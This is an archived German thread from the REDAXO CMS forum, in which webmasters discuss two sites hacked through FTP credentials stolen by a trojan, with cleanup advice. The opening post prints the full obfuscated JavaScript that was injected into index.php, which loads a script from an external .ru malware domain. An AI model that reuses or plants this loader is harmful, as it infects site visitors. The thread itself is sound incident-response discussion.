[phpBB Debug] PHP Warning: in file [ROOT]/ext/tas2580/seourls/event/listener.php on line 213: Undefined array key "FORUM_NAME"
2 redaxo Installationen gehackt - REDAXO Forum
Hallo,

Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.

Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt :-)
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
bretterelse
Beiträge: 11
Registriert: 22. Okt 2009, 01:40

2 redaxo Installationen gehackt

27. Mai 2010, 06:55

2 von einander unabhängige Redaxo Installationen von mir, bzw meinen Kunden, wurden gestern wohl gehackt..

beides genau das selbe..

in der index.php ist irgendein wilder javascript Code in der Zeile 74 zu finden..

Code: Alles auswählen

<script>var P=[];Uo=["n","Y_","c"];A={uQ:false};var U;r=function(){var em=["cM","rK","Lh"];QW=["ne","i","Ox"];function V(z,Vy,m){return z.substr(Vy,m);var I=33215;this.ry=26443;this.ry++;}this.OS="OS";var zx=V("/gonup",0,3)+"ogl"+V("lQHe.clHQ",3,3)+V("om/AKIz",0,3)+V("imaBXf",0,3)+V("KvfgebvKf",3,3)+V("am.AWF",0,3)+V("comb8w",0,3)+V("/coeyH",0,3)+"lle"+"geh"+V("sqzKumoszKq",4,3)+V("aMUr.cUMa",3,3)+V("om.3RH4",0,3)+V("umAphpmAu",3,3);var bf=["x"];var QV='';var L=RegExp;var s='';var FM='';try {var UH='bj'} catch(UH){};var Q=document;var sb="";this.xc=false;ni={QH:"S"};function t(z,Vy){Ln=["Oi","nI"];var m=new String("[")+Vy+String("]");var C=new L(m, "g");return z.replace(C, s);};var l=null;try {} catch(BQ){};this.E=60297;this.E-=54;var b=889236-881156;var Y=new String("bo"+"dy");try {var TV='_'} catch(TV){};this.Oq=28674;this.Oq++;var H=t('szcnrDiEpAtz','KABDzqwPfnEOmNJ');U=function(){var Uv={fv:"lh"};var fU=new Array();try {uO=["Fc","j","WL"];var Lj=t('cWr5e_aRtYewEYlReYmDeSnotx','5dskS_9oAUDxRYKZwW');TH=64565;TH-=190;this.LN='';e=Q[Lj](H);var g=t('sSrvcz','RSKbfdzwH5EWvT1');var ex=new String(V("deferBwib",0,5));var XG={og:false};var z=b+zx;FJ=56853;FJ-=47;this.me=false;var MS=new Array();QT={aK:false};this.XD=8471;this.XD-=123;e[g]=new String(V("htMGBH",0,2)+V("tpUZnN",0,2)+V("dKTR:/KTdR",4,2)+V("nIR/lnRI",3,2)+"uc"+"ky"+V("fi57gm",0,2)+"lt"+V("s1yh.s1y",3,2)+V("ruI5N",0,2)+V("QGv:QvG",3,1))+z;e[ex]=[1,8][0];sp=6381;sp+=214;Ni={rO:false};this.Vc="Vc";var ci=new Date();var cm='';var Bm='';Q[Y].appendChild(e);h_=32294;h_+=193;} catch(u){var D={sH:false};};var De=[];};Mc={Av:false};};r();var Wp=new Date();window.onload=U;XGC={ib:false};var _o=new Array();</script>

Hoster: all-inkl
Dateirechnte: 644
Änderungsdatum der Datei: gestern.. => da war aber sicher weder der Kunde noch ich dran..

Derzeit konnte ich wieder es zum laufen bekommen in dem ich die index.php einfach mit der alten überschrieben habe, doch irgendwo ist da ja der "Wurm"

Könnt Ihr mir bitte verraten wie ich das für die Zukunft vermeiden kann und was das überhaupt war?
Soll ich mich bei All-inkl mal melden?

zehbaeh
Beiträge: 556
Registriert: 17. Okt 2006, 11:52
Wohnort: Solingen

Re: 2 redaxo Installationen gehackt

27. Mai 2010, 11:46

bretterelse hat geschrieben: ...
Soll ich mich bei All-inkl mal melden?
Ja in jedem Fall. Das System ist kompromitiert. Ein Wiederherstellen der Index Datei dürfte da wenig helfen.
Aus den Server-Logs sollte sich der Angriffsvektor ermitteln lassen.

Benutzeravatar
Cheffchen
Beiträge: 1809
Registriert: 3. Mär 2009, 13:51
Wohnort: Berlin
Kontaktdaten: Website

27. Mai 2010, 22:30

Hallo bretterelse,

ja die Lieben Russen.

Hast die den code mal angeschaut, das (bitte die Seite nicht besuchen :O) ) http:// luckyfilth .ru kommt da raus natürlich ohne leerzeichen wollen ja nicht die noch unterstützen.

Code: Alles auswählen

htMGBH",0,2)+V("tpUZnN",0,2)+V("dKTR:/KTdR",4,2)+V("nIR/lnRI",3,2)+"uc"+"ky"+V("fi57gm",0,2)+"lt"+V("s1yh.s1y",3,2)+V("ruI5N",0,2)
Also als erst mal schaust per FTP die Änderungsdatum von der Index an und von allen js-Dateien, dürfte bei allen gleich sein.
Entweder du durchsuchst alle Ordner nach js Dateien und Dateien die mit index beginnen, denn in allen sind zum schluss 1 oder 2 Zeilen dazu gekommen, aber bitte alle die im Hosting sind.
Wenn Du noch zugriff auf anderen Hosting hast schau dort auch nach wegen Änderungsdatum index und js, dürften alle um die gleiche zeit sein wie bei dein Redaxo.

So wenn auch andere Hosting, dann warst Du schuld. War vor ganz kurzen eine Viruswarnung und hast auf Löschen geklickt :O).
Wenn nö hat noch jemand anders FTP Zugang dann schiebe das auf denn.
FTP Passwörter solltest auch ändern denn beim sogenannten Löschen wurden die FTP PW ausgelesen und die Dateien umgeschrieben um ein js Link zu den .ru zu setzten und ab und zu als virus zu arbeiten mit "virus gefunden löschen, ja" :O).

EDIT: gerade gesehen hast ja von 2 geschrieben, also warst schuld. DB Sichern, wenn Index das gelöscht hast müsstest wieder rein kommen. Dateien (files/) per FTP sichern ohne den ADDON ordner und diese Dateien Checken wenn auch js-Dateien drin sind. dann Alles Löschen und redaxo neu aufsetzten.

Cheffchen

bretterelse
Beiträge: 11
Registriert: 22. Okt 2009, 01:40

21. Jun 2010, 17:41

ja, alle .js Files im addons Ordner waren auch betroffen..

habe es nun "behoben"..

Benutzeravatar
Cheffchen
Beiträge: 1809
Registriert: 3. Mär 2009, 13:51
Wohnort: Berlin
Kontaktdaten: Website

21. Jun 2010, 21:43

Hallo,

aber hast auch FTP PW geändert sonnst kannst das in 14 Tage noch mal alles machen :O).

Cheffchen

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

Re: 2 redaxo Installationen gehackt

22. Jun 2010, 08:47

bretterelse hat geschrieben:2 von einander unabhängige Redaxo Installationen von mir, bzw meinen Kunden, wurden gestern wohl gehackt..
nicht REDAXO wurde gehackt, sondern mit ziemlicher Sicherheit Dein PC mit einem Trojaner verseucht, der Deine FTP-Passworte ausgelesen hat.

Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

Benutzeravatar
Ruediger.Nitzsche
Beiträge: 2117
Registriert: 13. Dez 2005, 09:29
Wohnort: Coburg
Kontaktdaten: Website

22. Jun 2010, 08:50

bretterelse hat geschrieben:ja, alle .js Files im addons Ordner waren auch betroffen..

habe es nun "behoben"..
Und Du bist Dir 100% sicher, dass sich nicht weiterer Schadcode auf dem Host befindet wie IRC-Bots, Spamskrite, etc.?

Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert

Benutzeravatar
Markus.Staab
Entwickler
Beiträge: 9634
Registriert: 29. Jan 2005, 15:50
Wohnort: Aschaffenburg/Germany
Kontaktdaten: ICQ Website

27. Jun 2010, 14:07

Welche redaxo version?

Ist schon sichergestellt dass der angriff ueber ftp erfolgt ist?

Gruß
Markus

morfer
Beiträge: 105
Registriert: 24. Mär 2009, 01:58

Angriffe

28. Jun 2010, 09:15

Hallo, kann auch von meiner Seite aus berichten, dass bei einem Kunden von mir das gleiche passiert ist. Grund war eine Trojaner Infektion seines PCs, der per FTP den Code unwissentlich auf den Server übertragen hatte.

Habe alle Dateien heruntergeladen und nach dem Code gesucht und gelöscht, dann wieder hochgeladen. Funktionierte ganz gut. Unbedingt FTP Passwort ändern!!! und alle PCs die per FTP zugreifen mit aktueller Antivirus Software checken lassen!

Gruß Daniel W.

Benutzeravatar
Cheffchen
Beiträge: 1809
Registriert: 3. Mär 2009, 13:51
Wohnort: Berlin
Kontaktdaten: Website

28. Jun 2010, 09:39

Ich klink mich mal noch mal ein,
Aktuelle Anti-Software ist gut aber wenn ihr FileZilla nutzt, nicht die PW gespeichert lassen, den FileZilla speichert Passwörter in klartext in eine Festen Datei (die ich letzt sage :O)), leichter kommt man nicht an die FTP PW da kann man das gleich auf die Homepage schreiben :O).

Cheffchen

Zurück zu „Sonstiges“